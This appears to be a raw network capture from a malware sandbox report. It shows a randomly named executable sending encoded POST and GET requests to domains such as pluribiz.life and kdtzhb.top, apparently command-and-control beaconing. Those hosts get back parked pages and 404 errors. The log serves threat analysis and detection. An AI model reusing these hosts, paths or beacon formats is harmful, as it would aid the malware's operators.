                                                                                                                                                  Nov 14, 2024 15:40:30.902249098 CET381OUTGET /d26j/?W638b4U=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN1iJSRG9yUGoI2tAgRBkFBhEuTNxXB6UGYS0PM3LmZFBqDA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:40:31.521033049 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:31 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1494
                                                                                                                                                  x-request-id: 031db4ea-a57b-4809-ac52-1659b6b8ea5c
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_p1xJXN0LcHq+7IiiJA28KHnkIiWJeqqhmXQCigVotsqCn8BB7YVgpPNzjTZFIRxlpSToe1UT7SZb4VahcihEeA==
                                                                                                                                                  set-cookie: parking_session=031db4ea-a57b-4809-ac52-1659b6b8ea5c; expires=Thu, 14 Nov 2024 14:55:31 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 31 78 4a 58 4e 30 4c 63 48 71 2b 37 49 69 69 4a 41 32 38 4b 48 6e 6b 49 69 57 4a 65 71 71 68 6d 58 51 43 69 67 56 6f 74 73 71 43 6e 38 42 42 37 59 56 67 70 50 4e 7a 6a 54 5a 46 49 52 78 6c 70 53 54 6f 65 31 55 54 37 53 5a 62 34 56 61 68 63 69 68 45 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_p1xJXN0LcHq+7IiiJA28KHnkIiWJeqqhmXQCigVotsqCn8BB7YVgpPNzjTZFIRxlpSToe1UT7SZb4VahcihEeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:40:31.521059036 CET947INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDMxZGI0ZWEtYTU3Yi00ODA5LWFjNTItMTY1OWI2YjhlYTVjIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  13192.168.2.549992209.74.64.58804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:36.726937056 CET639OUTPOST /afcr/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  Origin: http://www.pluribiz.life
                                                                                                                                                  Referer: http://www.pluribiz.life/afcr/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 54 48 49 6c 66 36 4b 34 4b 2b 59 43 4c 69 57 68 64 50 78 5a 43 54 59 50 32 33 50 56 71 46 55 69 4f 37 42 47 34 63 3d
                                                                                                                                                  Data Ascii: W638b4U=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fTHIlf6K4K+YCLiWhdPxZCTYP23PVqFUiO7BG4c=
                                                                                                                                                  Nov 14, 2024 15:40:37.381683111 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:37 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  14192.168.2.549993209.74.64.58804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:39.269735098 CET659OUTPOST /afcr/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  Origin: http://www.pluribiz.life
                                                                                                                                                  Referer: http://www.pluribiz.life/afcr/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 2f 67 66 6c 2f 34 45 61 6b 39 34 74 72 78 59 76 4a 51 72 70 78 53 57 51 57 56 44 59 73 75 30 6f 4c 6b 48 73 50 68
                                                                                                                                                  Data Ascii: W638b4U=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKi/gfl/4Eak94trxYvJQrpxSWQWVDYsu0oLkHsPh
                                                                                                                                                  Nov 14, 2024 15:40:39.943690062 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:39 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  15192.168.2.549994209.74.64.58804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:41.814821959 CET1676OUTPOST /afcr/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  Origin: http://www.pluribiz.life
                                                                                                                                                  Referer: http://www.pluribiz.life/afcr/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 69 4c 4c 35 43 39 75 2f 7a 2b 52 68 48 6c 59 57 4c 4b 53 4d 78 65 2b 4d 33 4c 53 64 4a 4a 6e 4b 52 34 41 55 53 46 4a 72 39 31 33 2b 33 2b 4f 62 2b 53 32 55 54 51 63 57 75 66 36 45 52 70 69 48 62 7a 6d 61 57 44 65 5a 77 52 6c 48 35 30 48 69 4c 39 56 79 67 50 43 4f 69 57 54 5a 6f 66 73 33 44 57 31 74 68 4e 50 57 64 77 62 68 77 61 41 5a 46 51 39 4d 44 2f 7a 53 6a 55 64 59 49 4b 42 53 39 32 65 43 72 50 62 4e 6d 78 2f 46 2f 4b 49 4f 68 61 54 45 2f 31 53 51 31 78 39 77 59 30 32 64 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS9HlyRCnpdVa2R0WZOGiLiL1yriRiYNI0lpVzxFqh8/fCRPh+yk3HeUq7b2Elw1RKux463+6iRps+nTdxHI7qa6OyVtj1/NqIHr7E3w+6qlN/t4pHXGxdnMzWRz/o975psiLL5C9u/z+RhHlYWLKSMxe+M3LSdJJnKR4AUSFJr913+3+Ob+S2UTQcWuf6ERpiHbzmaWDeZwRlH50HiL9VygPCOiWTZofs3DW1thNPWdwbhwaAZFQ9MD/zSjUdYIKBS92eCrPbNmx/F/KIOhaTE/1SQ1x9wY02dJe/nuLHaWilGqd+SbLUthSIle0H0oCLrQP3D/EbDEpilBjhgYH+BTTyAOxaV9f5qrwtI69BCg9sqpCXV0MuDb/g1NctGifv1kKZ790FCU/yeyxWsPi59a0fVg05fwVtfVuc4flW0e93idYYWmakLGBcFkgaHfy2WkaoLMrBjdobq9opLy7XkvugnKCpVwWpNLUjLK3wkyoCI98o7FbwFW19/b4Kbom+7KoBk/5xL4/iaHYOvoLdyyLZl9u5cq/DX1i2bkgI1u4FtTtiZX+/3pqGzNmaxrWEV4Z/NzHX/JxndiEeUKbJDhuIX6xnZ/Fj8vlqoGUMUzA7M47EdH+hSm4kHhXEsO65VHEjRPksXAQYZLdY/Z2mHlB6IeyTjKDhomUM4hyljNT6/Eyk/YusJGTdgp5svq47Evad2iSoG12t6pdQfhJ4ljmt2qZgdAmGlr0t36CrbiMEMvTX/jGOK/fEAN6eYjJm/dUUT6ApEDzW8UgcDuLe08zaJgfJHCkNkoSskTVwLam2jmrnUnIhVjhGf8XwjhCVFY073Hl7aurIcGA+a6WLoGCgJmi6tSr9sTnP2t3nyN5VdLqXq4can7exuX2m5CSE5FqFLrBX5+xYPKn8hEvjDFpKGdVFfcp3cXQDZAPUEtxmdjDQBjW1AhvDRPYlGqSfELG [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:40:42.497665882 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:42 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  16192.168.2.549995209.74.64.58804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:44.361145020 CET382OUTGET /afcr/?Xll=50hLc0Hhy&W638b4U=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8CGv24SZJcM9CuKerlXN+FNsiyWCFzy1PjnGczRtZq9rVpg== HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.pluribiz.life
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:40:45.028980970 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:44 GMT
                                                                                                                                                  Server: Apache
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  17192.168.2.54999647.242.89.146804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:50.575277090 CET630OUTPOST /1iqa/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  Origin: http://www.kdtzhb.top
                                                                                                                                                  Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 64 6e 45 42 6e 57 71 42 45 57 74 67 69 59 43 70 39 46 48 5a 7a 5a 75 6c 6d 53 56 36 50 4e 38 44 2b 6c 43 67 58 30 3d
                                                                                                                                                  Data Ascii: W638b4U=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcYdnEBnWqBEWtgiYCp9FHZzZulmSV6PN8D+lCgX0=
                                                                                                                                                  Nov 14, 2024 15:40:51.547610044 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:51 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
